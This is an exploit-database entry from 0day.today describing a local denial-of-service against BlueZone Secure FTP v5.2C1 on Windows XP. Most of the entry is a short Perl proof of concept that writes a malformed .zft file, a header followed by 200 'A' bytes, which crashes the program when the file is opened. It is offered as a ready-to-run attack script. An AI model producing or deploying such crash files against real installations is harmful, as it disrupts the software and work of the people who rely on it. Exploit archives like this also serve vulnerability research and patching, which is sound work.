BlueZone Malformed .zft file Local Denial of Service

2011-10-23T00:00:00
ID 1337DAY-ID-17106
Type zdt
Reporter Iolo Morganwg
Modified 2011-10-23T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            #!/usr/bin/perl -w
# Exploit Title: BlueZone Desktop Malformed .zft ffeil Local Denial of Service
# Date: 24-10-11
# Author: Iolo Morganwg
# Version: BlueZone Secure FTP v5.2C1 Build 1469
# Download: http://www.rocketsoftware.com/bluezone/products/secure-ftp/downloads/secure-ftp
# Tested on: Windows XP SP3
 
#To trigger: Run script {chwilfriwio.pl}, open with BlueZoneFTP, program dies - horribly!.
  
my $ffeil = "chwilfriwio.zft";
my $head = "BFTP100EKColorsVCustom@";
my $junk = "A" x 200;
  
open($ffeil, ">$ffeil");
print $ffeil $head.$junk;
close($ffeil);



#  0day.today [2018-02-06]  #